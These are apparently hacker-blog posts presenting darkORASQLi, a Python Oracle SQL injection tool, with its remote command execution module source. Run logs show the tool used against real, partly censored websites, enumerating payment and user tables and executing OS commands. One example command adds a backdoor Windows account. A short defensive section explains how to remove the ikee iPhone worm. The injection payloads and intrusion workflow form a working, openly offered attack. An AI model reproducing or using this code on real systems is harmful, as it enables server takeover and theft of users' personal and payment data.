Pwning Oracle OS Server with darkORASQLi - Remote Command Execution

Guys! im adding TWO new module/features to darkORASQLi
check this out..

print "    --pwn              Injecting OS command execution function"
print "    --cmd              Command to exec"

SOURCE CODE:

# Mode --pwn
if mode != "" and mode == "--pwn":
       print "[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command\n[+] Sending our ^EVIL^ pay
loads:\n"

       payload1_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''create+or+replace+and+compil
e+java+source+named+\"LinxUtil\"+as+import+java.io.*;+public+class+LinxUtil+extends+Object+{public+static+String+runCMD(String+args)+{try{Buffered
Reader+myReader=+new+BufferedReader(new+InputStreamReader(+Runtime.getRuntime().exec(args).getInputStream()+)+);+String+stemp,str=\"\";while+(
(stemp+=+myReader.readLine())+!=+null)+str+%2b=stemp%2b\"\\n\";myReader.close();return+str;}+catch+(Exception+e){return+e.toString();}
}public+static+String+readFile(String+filename){try{BufferedReader+myReader=+new+BufferedReader(new+FileReader(filename));+String+stemp,str=\"\"{ 
; }while+((stemp+=+myReader.readLine())+!=+null)+str+%2b=stemp%2b\"\\n\";myReader.close();return+str;}+catch+(Exception+e){return+e.toStri
ng();}}}'''';END;'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

       sys.stdout.write("[+] Stage 1: Creating Java Library                                             ")
       source1 = GetThatShit(payload1_URL)
       match1 = re.findall("ORA-",source1)
       if len(match1) >= 1:
               sys.stdout.write("[ FAIL ]\n")
       else:
               sys.stdout.write("[  OK  ]\n")

       time.sleep(5)

       payload2_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''begin+dbms_java.grant_permis
sion(+''''''''PUBLIC'''''''',+''''''''SYS:java.io.FilePermission'''''''',+''''''''<>'''''''',+''''''''execute''''''''+);end;'''';END{ 
; }'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

       sys.stdout.write("[+] Stage 2: Granting Java Execute Privileges                                  ")
       source2 = GetThatShit(payload2_URL)
       match2 = re.findall("ORA-",source2)
       if len(match2) >= 1:
               sys.stdout.write("[ FAIL ]\n")
       else:
               sys.stdout.write("[  OK  ]\n")

       time.sleep(5)

       payload3_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''create+or+replace+function+L
inxRunCMD(p_cmd+in+varchar2)+return+varchar2+as+language+java+name+''''''''LinxUtil.runCMD(java.lang.String)+return+String'''''''';+'''';END{ 
; }'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

       sys.stdout.write("[+] Stage 3: Creating Function for Command Execution                           ")
       source3 = GetThatShit(payload3_URL)
       match3 = re.findall("ORA-",source3)
       if len(match3) >= 1:
               sys.stdout.write("[ FAIL ]\n")
       else:
               sys.stdout.write("[  OK  ]\n")

       time.sleep(5)

       payload4_URL = site.replace("utl_inaddr.get_host_address((darkc0de))","(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
'DBMS_OUTPUT\".PUT(:P1);EXECUTE+IMMEDIATE+''DECLARE+PRAGMA+AUTONOMOUS_TRANSACTION;BEGIN+EXECUTE+IMMEDIATE+''''grant+all+on+LinxRunCMD+to+p
ublic'''';END;'';END;--','SYS',0,'1',0)+from+dual)")+arg_end

       sys.stdout.write("[+] Stage 3: Making Function Executable by All Users                           ")
       source4 = GetThatShit(payload4_URL)
       match4 = re.findall("ORA-",source4)
       if len(match4) >= 1:
               sys.stdout.write("[ FAIL ]\n")
       else:
               sys.stdout.write("[  OK  ]\n")

       time.sleep(5)

       print "\n[+] If all OK you should now can exec command with --cmd option"
       print "[+] Example: \n"
       print "[+]           Windows"
       print "[+]           --cmd \"cmd.exe /c net user d3ck4 d4rkc0d3rz /add\"\n"
       print "[+]           UNIX/Linux"
       print "[+]           --cmd \"/bin/uname -a\"\n"
       sys.exit(1) 

# Mode --cmd
elif mode == "--cmd":
       print "\n[+] Executing OS command from the server"
       count_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||COUNT(sys.LinxRunCMD(\'"+arg_cmd.replace(" ","+")+"\'))||CHR(35)||CHR(58)+FROM+
DUAL")+arg_end
       line_URL = site.replace("darkc0de","SELECT+CHR(35)||CHR(35)||sys.LinxRunCMD(\'"+arg_cmd.replace(" ","+")+"\')||CHR(35)||CHR(58)+FROM+DUAL")+a
rg_end
       arg_row = "Command Lines"

MODULE IN ACTION

--pwn 
angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=[censored]35'" --pwn

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=100[censored]5'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library                                             [  OK  ]
[+] Stage 2: Granting Java Execute Privileges                                  [  OK  ]
[+] Stage 3: Creating Function for Command Execution                           [  OK  ]
[+] Stage 3: Making Function Executable by All Users                           [  OK  ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+]           Windows
[+]           --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+]           UNIX/Linux
[+]           --cmd "/bin/uname -a"

--cmd "/bin/uname -a"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=10[censored]35'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=10[censored]35'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux a[censored]n 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux


[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log 

--cmd "/sbin/ifconfig"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1[censored]5'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1[censored]5'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:11:[censored]:DC
         inet addr:10.[censored]  Bcast:10.[censored]  Mask:255.255.255.0
         inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
         inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
         UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
         RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
         TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:63516816827 (59.1 GiB)  TX bytes:231324821682 (215.4 GiB)
         Interrupt:201

eth1      Link encap:Ethernet  HWaddr 00:11:[censored]:DD
         inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
         UP BROADCAST MULTICAST  MTU:1500  Metric:1
         RX packets:0 errors:0 dropped:0 overruns:0 frame:0
         TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
         Interrupt:209

lo        Link encap:Local Loopback
         inet addr:127.0.0.1  Mask:255.0.0.0
         inet6 addr: ::1/128 Scope:Host
         UP LOOPBACK RUNNING  MTU:16436  Metric:1
         RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
         TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:0
         RX bytes:93467115 (89.1 MiB)  TX bytes:93467115 (89.1 MiB)



[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, HAPPY HACKING ;-)
- d3ck4 -

Howto: Prevent & Remove The World First iPhone Worm "ikee virus" with Rick Astley as Wallpaper

Say ? read all these first mate..

World's first iPhone worm Rickrolls angry fanbois
Hey, jailbreakers: ikee never gonna give you up
http://www.theregister.co.uk/2009/11/08/iphone_worm_rickrolls_users/

The attacks, which researchers say are the world's first iPhone worm in the wild, target jailbroken iPhones that have SSH software installed and keep Apple's default root password of "alpine." In addition to showing a well-coiffed picture of Astley, the new wallpaper displays the message "ikee is never going to give you up," a play on Astley's saccharine addled 1987 hit "Never Gonna Give You Up."

3gs wallpaper changed by an app! Help! (iPhone Rickrolling)
http://forums.whirlpool.net.au/forum-replies.cfm?t=1315624

the topic starter say:

So i woke up this morning to find that the wallpaper on my Jailbroken 3GS had been changed to a picture of Rick Astley (some 80's singer?) with the words "ikee is never going to give you up" (the lyrics or title form a song of his)

I have winterboard, and previously had a photo of my partner as the wallpaper. I have tried the following to no avail:

1. Changing the wallpaper back thorugh settings
2. Unticking the "User Wallpaper" option in winterboard – NOTE: this DID remove the picture from the background of my main menu but Rick still appears on my unlock screen.
3. Re-ticking the "User Wallpaper" option in winterboard and changing the wallpaper in settings – rick still appears.

A search of google has turned up nothing, same with the forums.

My guess is one of the apps ive installed has done this and changed something unconfigure-able through the normal settings. Any help is much appreciated. I hate 80s music.

This is my setup:
3GS 16gb
Os 3.1.2 (7D11) on OPTUS
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Interview with ikee (iPhone Virus Creator) - ikee virus removal details enclosed
http://blog.jeltel.com.au/2009/11/interview-with-ikee-iphone-virus.html

ikee say:

[09:05] Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.

Hacking Expose say:

To Prevent:
---------------

1. CHANGE DEFAULT ROOT PASSWORD WHICH IS "alphine" AFTER JAILBREAK YOUR IPHONE

To Remove:
---------------

1. OPEN SSH SESSION OR MOBILE-TERMINAL
2. USE COMMAND "RM -RF" TO DELETE, "MAN RM" FOR MORE INFO
3. DELETE THESE FILES AND DIRECTORIES IF ANY AVAILABLE
(for variant A,B,C)

/bin/poc-bbot
/bin/sshpass
/var/log/youcanbeclosertogod.jpg
/var/mobile/LockBackground.jpg (or /var/mobile/Library/LockBackground.jpg)
/System/Library/LaunchDaemons/com.ikey.bbot.plist
/var/lock/bbot.lock

(for variant D, it will overwrite Cydia's file, so reinstall Cydia after removal)

/usr/libexec/cydia/startup
/usr/libexec/cydia/startup.so
/usr/libexec/cydia/startup-helper
/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist

4. REINSTALL SSH DAEMON

60% Working of darkORASQLi.py - Multi Purpose Oracle SQL Injection Tool

as posted at http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=11271

hai guys.. during free time, im continuing this project and here some snapshot

#!/usr/bin/python
# 07/11/09 d3ck4, hacking.expose@gmail.com
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Multi-Purpose Oracle SQL Injection Tool
# FUNCTIONS
# *error base using utl_inaddr.get_host_address() function method (default method n happy with it!)
# *refer: http://www.red-database-security.com/whitepaper/oracle_sql_injection_web.html
# *full/current/owner base schema enumeration
# *table and column dump
# *database list extractor
# *owners enumeration
# *general info gathering

# UPCOMING (contribution is most welcome!)
# *auto encode to CHR() to bypass quote escaping in where clause statement
# *blind injection support
# *load file and copy to
# *shell exec
# *--update / --drop / --create / etc..

# FEATURES
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used

# darkc0de Crew
# www.darkc0de.com
# d3ck4, hacking.expose[at]gmail[dot]com

# big credit goes to rsauron, rsauron@gmail.com.
# for the beautiful c0de of darkMySQLi & darkMSSQLi
# d3hydr8 and all the darkc0de cr3w

# Share the c0de!

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --info

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:16:34
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production


[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[-] 22:16:37
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dbs

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:16:49
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[1] CBCPR2.[somevulnsite].ORG

[-] 22:16:54
[-] Total URL Requests: 4
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --owner

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com           v1.0  |
|                                                 |
|   5/2009      darkORASQLi.py                    |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help      hackingexpose.blogspot.com  |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:17:00
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing all owners in current database
[+] Number of Owners: 15

[1] RTM
[2] LINXSQL
[3] REBEYOND
[4] DBSNMP
[5] OUTLN
[6] PAY_APP
[7] WATERBIRD
[8] IBA_REPORT
[9] WATCHLIST
[10] IBA_APP
[11] PAYMENT
[12] CBC_APP
[13] APP
[14] SYSTEM
[15] SYS

[-] [22:17:19]
[-] Total URL Requests: 18
[-] Done

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:17:33
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from current user
[+] Number of Tables: 68

[1] WL_ALERTS: ALERT_ID,ALERT
[2] WL_CATS: CAT_ID,CAT_TITLE,CAT_ORDER
[3] WL_GEO_RANGES: RANGE_ID,RANGE
[4] WL_SPECIES: SPECIES_CODE,COM_NAME,SCI_NAME,COM_NAME_UC,SCI_NAME_UC,TAXON_CODE,COUNTABLE,BOLD,IN_USE,DISPLAY_GROUP,SP,COM_NAME_ALT,ACT
IVE,SCI_NAME_ALT,SORT_AOU,SORT_ABA,SORT_SIBLEY,SORT_THAYER,SORT_CBC,SORT_CBC_ALT1,SORT_CBC_ALT2,COM_NAME_FR,SPECIES_ID
[5] WL_WATCHLIST: WL_ID,ALERT_ID,SPECIES_ID,CAT_ID,RANGE_ID,SPECIES_CODE,POPULATION,IMAGE,PHOTOG_NAME,SUMMARY,IDENT,DIST,MAP,ECOLOGY,THRE
ATS,CONSERV,TODO,REFS,INCOMPLETE
[6] WL_WATCHLIST_BK0920: TODO,POPULATION,REFS,SUMMARY,RANGE_ID,SPECIES_CODE,MAP,ALERT_ID,SPECIES_ID,THREATS,CONSERV,PHOTOG_NAME,WL_ID,CAT
_ID,IMAGE,INCOMPLETE,ECOLOGY,DIST,IDENT

[-] 22:18:52
[-] Total URL Requests: 72
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema -S all

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:21:30
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from all users schema
[+] Number of Tables: 26520

[Owner]: SYS
[Table: Columns]

[1] TAB$: BOBJ,CLUCOLS,CHNCNT,PROPERTY,SPARE3
[2] CLU$: PCTFREE$,MAXTRANS,FUNC
[3] UET$: FILE
[4] SEG$: FILE,EXTSIZE,GROUPS
[5] UNDO$: UGRP,KEEP
[6] TS$: TS,PLUGGED,AFFSTRENGTH
[7] OBJ$: DATAOBJ
[8] IND$: DISTKEY,LBLKKEY,ANALYZETIME,ROWCNT
[9] ICOL$: OBJ,OFFSET,SPARE1
[10] COL$: FIXEDSTORAGE,PROPERTY
[11] USER$: USER,PASSWORD,PTIME,EXPTIME,RESOURCE$,DEFSCHCLASS
[12] PROXY_ROLE_DATA$: ROLE
[13] CON$: OWNER
[14] CDEF$: OBJ,RCON

[Owner]: CBC_APP
[Table: Columns]

[15] CBC_AUX_LOC: LOC_ID,N_LATITUDE_PUB,IRREGULAR
[16] CBC_AUX_RARE_BIRD: OBS_ID

angryleopard:darkc0de d3ck4$ python pg_encode.py PAY_APP
CHR(80)||CHR(65)||CHR(89)||CHR(95)||CHR(65)||CHR(80)||CHR(80)||CHR(10)

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --schema -S "CHR(65)||CHR(80)||C
HR(80)"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:42:23
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Showing Tables & Columns from user "CHR(65)||CHR(80)||CHR(80)" schema
[+] Number of Tables: 122

[Owner]: APP
[Table: Columns]

[1] PAYMENTS: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS,PAY_ID
[2] PAYMENTS_GHBAK: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS
[3] PLAN_TABLE: STATEMENT_ID,TIMESTAMP,REMARKS,OPERATION,OPTIONS,OBJECT_NODE,OBJECT_OWNER,OBJECT_NAME,OBJECT_INSTANCE,OBJECT_TYPE,OPTIMIZ
ER,SEARCH_COLUMNS,ID,PARENT_ID,POSITION,COST,CARDINALITY,BYTES,OTHER_TAG,PARTITION_START,PARTITION_STOP,PARTITION_ID,DISTRIBUTION
[4] PROJECTS: PROJ_ID,URL,DESCRIPTION,P_NAME,OPEN
[5] ROLES: ROLE_DESC,ROLE,ROLE_ID,PROJECT_ID
[6] USERS: HOME_PHONE,EMAIL,ZIP_CODE,STATE,CITY,ADDRESS,LAST_NAME,FIRST_NAME,LAST_UPDATE,CREAT_DATE,ADDRESS_2,USER_ID,COUNTRY,PRIMARY,OPT
_IN,ORGANIZATION,TITLE
[7] USER_CIRCLE_HUMA: FIRST_NAME,LAST_NAME,EMAIL,ABBREV
[8] USER_LOGIN: PASS,LOGIN,USER_ID,LAST_LOGIN
[9] USER_ROLE: USER_ROLE_ID,USER_ID,ROLE_ID,SCOPE_TYPE,SCOPE_VALUE,EXPIRE_DATE
[10] USER_CIRCLE_CBC106: ROLE_ID,LOC_ID,USER_ID,ID,COUNT_YR
[11] USER_CIRCLE_BAK: ROLE_ID,LOC_ID,USER_ID,ID,COUNT_YR
[12] USER_REGION_BAK: ID,USER_ID,REGION_CODE,ROLE_ID
[13] PROJECT_USER_BAK: ROLE_ID,PROJ_ID,USER_ID
[14] USER_ROLE_BAK: USER_ROLE_ID,USER_ID,ROLE_ID,SCOPE_TYPE,SCOPE_VALUE,EXPIRE_DATE
[15] PAYMENTS_BK: DONATION,METHOD,AMOUNT,PROJ_ID,PAYMENT_DATE,PAYMENT_ID,USER_ID,COUNT_YR,AUTH_CODE,LOC_ID,NUM_UNITS,PAY_ID
[16] PLAN_TABLE: OTHER

[-] 22:44:38
[-] Total URL Requests: 126
[-] Done

Don't forget to check darkORASQLi.log

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dump -T USER_LOGIN -C USER_ID,
LOGIN,PASS

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:46:31
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Dumping data from current database and Table "USER_LOGIN"
[+] and Column(s) ['USER_ID', 'LOGIN', 'PASS']

Seems like we dont have permission to view that table or it never exist!

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156" --dump -T WL_SPECIES -C SPECIES_
CODE,COM_NAME,SCI_NAME,COM_NAME_UC,SCI_NAME_UC,TAXON_CODE

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com            v1.0 |
|                                                 |
|   05/2009        darkORASQLi.py                 |
|  -- Multi Purpose Oracle SQL Injection Tool --  |
| Usage: darkORASQLi.py [options]                 |
|        -h help       hackingexpose.blogspot.com |
|                                                 |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com  |
|-------------------------------------------------|

[+] URL: http://[somevulnsite]/watchlist/viewSpecies.jsp?id=156
[+] 22:49:04
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: CBCPR2.[somevulnsite].ORG
User: WATCHLIST
Version: Oracle9i Enterprise Edition Release 9.2.0.6.0 - 64bit Production

[+] Dumping data from current database and Table "WL_SPECIES"
[+] and Column(s) ['SPECIES_CODE', 'COM_NAME', 'SCI_NAME', 'COM_NAME_UC', 'SCI_NAME_UC', 'TAXON_CODE']
[+] Number of Rows: 11756

[1] estspa:Eastern Sharp-tailed Sparrow:Ammodramus caudacutus:EASTERN SHARP-TAILED SPARROW:AMMODRAMUS CAUDACUTUS:
[2] eucdov:Eurasian Collared-Dove:Streptopelia decaocto:EURASIAN COLLARED-DOVE:STREPTOPELIA DECAOCTO:12020020200:
[3] eucmer:(European) Common Merganser:Mergus merganser:(EUROPEAN) COMMON MERGANSER:MERGUS MERGANSER:07012160101:
[4] eugplo:European Golden-Plover:Pluvialis apricaria:EUROPEAN GOLDEN-PLOVER:PLUVIALIS APRICARIA:11022010200:
